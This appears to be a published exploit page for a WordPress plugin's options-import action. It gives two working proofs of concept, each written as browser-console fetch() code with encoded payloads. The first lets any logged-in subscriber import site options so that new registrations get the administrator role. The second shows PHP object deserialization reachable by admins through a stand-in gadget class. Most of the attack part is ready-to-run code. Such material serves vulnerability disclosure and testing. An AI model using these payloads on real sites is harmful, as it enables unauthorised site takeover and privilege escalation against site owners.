## https://sploitus.com/exploit?id=WPEX-ID:35C9A954-37FC-4818-A71F-34AAAA0FA3DB
1) Log in to the site as a subscriber (any authenticated user; no elevated capability is needed).
2) From any page of the site, so that the request carries the subscriber's session cookies, run the following in your browser's console:
```
// Subscriber-level PoC: POST to the plugin's admin-ajax handler. The action
// imports site options from the `data` parameter without checking the caller's
// capability, and `credentials: "include"` sends the logged-in subscriber's cookies.
fetch('/wp-admin/admin-ajax.php', {
  method: 'POST',
  credentials: "include",
  mode: 'cors',
  headers: {
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  // Payload as published in the advisory (URL-safe base64 of the compressed options blob)
  body: 'action=ovic_vc_import_options&data=eNoljEEKgCAQXDC_EvsD6xLrtVwndJctNxFMYdcOEf09pevMMIQTPopmRriURd1O2QmHqJUFbERjmx0RPB90peqkJIbOJgTyZ8ytFKpFOmyXLZWQ6fwbg7ByO_lhu4cF7PsBLlEk4w'
})
  .then(response => response.text())
  .then(data => {
    // The handler's response body (empty or "0" on a default install is still
    // consistent with the options having been written).
    console.log(data);
  })
```
3) Log out and register a new account via /wp-login.php. Because of the options just imported, the new account is created with the `administrator` role.
---
In versions after 1.2.8 the subscriber path is closed, but the following PoC demonstrates that a PHP object deserialization issue remains, reachable by Admin+ users:
1) Ensure that the WP Bakery plugin is installed and activated.
2) Place the following PHP class on the server (for example in a must-use plugin or the active theme's functions.php; any location that is loaded on every request works) to stand in for a real gadget chain:
```
<?php
// Stand-in gadget: a class whose __wakeup() has a visible side effect. If the
// plugin passes attacker-controlled data to unserialize(), an O:4:"Evil":0:{}
// payload instantiates this class and PHP calls __wakeup() immediately.
class Evil {
	public function __wakeup() : void {
		error_log( "[*] Evil object unserialize! BOOM!" );
		die( "[*] Evil object unserialize! BOOM!" );
	}
}
```
3) As an administrator, visit /wp-admin/admin.php?page=ovic-vc-addon; this page defines the `ovic_vc_params` JavaScript object (including `ajaxurl`) that the next step relies on.
4) Run the following in the browser console. The response body should contain the `__wakeup()` message, showing that the object was unserialized on the server:
```
// Admin-level PoC: same import action, but `data` now carries a serialized
// PHP object instead of an options array.
fetch(ovic_vc_params.ajaxurl, {
  method: 'POST',
  credentials: "include",
  mode: 'cors',
  headers: {
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  // Compressed, URL-safe-base64 form of O:4:"Evil":0:{}
  body: 'action=ovic_vc_import_options&data=eNrztzKxUnIty8xRsjKwqq4FXDAgkQRo'
})
  .then(response => response.text())
  .then(data => {
    // Expected to contain: [*] Evil object unserialize! BOOM!
    console.log(data);
  })
```